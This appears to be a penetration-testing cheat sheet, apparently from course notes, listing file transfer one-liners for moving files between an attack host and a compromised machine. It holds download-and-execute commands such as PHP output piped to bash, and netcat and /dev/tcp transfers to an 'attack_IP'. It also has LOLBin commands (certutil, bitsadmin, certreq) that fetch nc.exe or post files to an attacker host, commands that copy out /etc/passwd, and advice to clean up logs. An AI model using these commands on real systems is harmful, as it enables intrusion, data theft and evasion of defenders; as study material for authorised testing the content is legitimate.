Advanced File Transfer Techniques

Programming Language Methods

Python

# Python 2 Download
python2.7 -c 'import urllib; urllib.urlretrieve("URL", "output_file")'

# Python 3 Download
python3 -c 'import urllib.request; urllib.request.urlretrieve("URL", "output_file")'

# Python 3 Upload (requires requests)
python3 -c 'import requests; requests.post("http://<IP>:<PORT>/upload", files={"files": open("/path/to/file", "rb")})'

PHP

# Download with file_get_contents
php -r '$file = file_get_contents("URL"); file_put_contents("output_file", $file);'

# Download with fopen
php -r 'const BUFFER = 1024; $fremote = fopen("URL", "rb"); $flocal = fopen("output_file", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

# Download and Execute
php -r '$lines = @file("URL"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

Ruby and Perl

# Ruby Download
ruby -e 'require "net/http"; File.write("output_file", Net::HTTP.get(URI.parse("URL")))'

# Perl Download
perl -e 'use LWP::Simple; getstore("URL", "output_file");'

Windows Scripting Methods

JavaScript (wget.js)

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

Execute with: cscript.exe /nologo wget.js URL output_file

VBScript (wget.vbs)

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

Execute with: cscript.exe /nologo wget.vbs URL output_file

Netcat and Network Transfer Methods

Basic Netcat Transfer

# Receiver (Listening Mode)
nc -l -p 8000 > file_name.exe

# Sender
nc -q 0 target_IP 8000 < file_name.exe

Ncat with Enhanced Features

# Receiver
ncat -l -p 8000 --recv-only > file_name.exe

# Sender
ncat --send-only target_IP 8000 < file_name.exe

Alternative Methods

# Listen on Attack Host
sudo nc -l -p 443 -q 0 < file_name.exe

# Connect from Compromised Machine
nc attack_IP 443 > file_name.exe

# Using /dev/tcp (No Netcat)
cat < /dev/tcp/attack_IP/443 > file_name.exe

PowerShell Session File Transfer

WinRM Setup and Transfer

# Test Connection
Test-NetConnection -ComputerName target_name -Port 5985

# Create Session
$Session = New-PSSession -ComputerName target_name

# Transfer Files
Copy-Item -Path C:\localfile.txt -ToSession $Session -Destination C:\remote_path\
Copy-Item -Path "C:\remote_path\remote_file.txt" -Destination C:\local_path\ -FromSession $Session

Protected File Transfers

Windows Encryption

# Encrypt String
Invoke-AESEncryption -Mode Encrypt -Key "p@ssw0rd" -Text "Sensitive Data"

# Decrypt String
Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Text "<Encrypted_String>"

# Encrypt File
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\file.bin

# Decrypt File
Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\file.bin.aes

Linux Encryption

# Encrypt File
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc

# Decrypt File
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd

HTTP/S File Upload Server

Nginx Upload Server Setup

# Create Upload Directory
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory

# Nginx Configuration (/etc/nginx/sites-available/upload.conf)
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
    }
}

# Enable Configuration
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo systemctl restart nginx.service

# Test Upload
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt

Living off The Land (LOLBins/GTFOBins)

Windows LOLBins Examples

# CertReq Upload
certreq.exe -Post -config http://<attack_IP>:8000/ C:\Windows\win.ini

# Bitsadmin Download
bitsadmin /transfer myJobName /priority foreground http://<attack_IP>:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

# Certutil Download
certutil.exe -verifyctl -split -f http://<attack_IP>:8000/nc.exe

# PowerShell BITS
Import-Module bitstransfer; Start-BitsTransfer -Source "http://<attack_IP>:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

Linux GTFOBins Examples

# OpenSSL Transfer
# On Attack Host
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

# On Target
openssl s_client -connect <attack_IP>:80 -quiet > LinEnum.sh

Best Practices

Security Considerations
- Always encrypt sensitive data before transfer
- Use secure protocols when available (HTTPS, SFTP, SSH)
- Clean up files and logs after transfer
Protocol Selection
- Consider firewall restrictions
- Use commonly allowed protocols (HTTP/HTTPS)
- Have multiple methods ready as backup
Authentication and Access
- Use strong, unique passwords for encrypted transfers
- Remove temporary access after transfer completion
- Monitor for security alerts during transfer
Testing and Verification
- Verify file integrity after transfer
- Test transfer methods in lab environment first
- Document successful methods for future reference

PreviousFile Transfer Techniques for Pentesting NextFile Transfer Detection & Evasion Techniques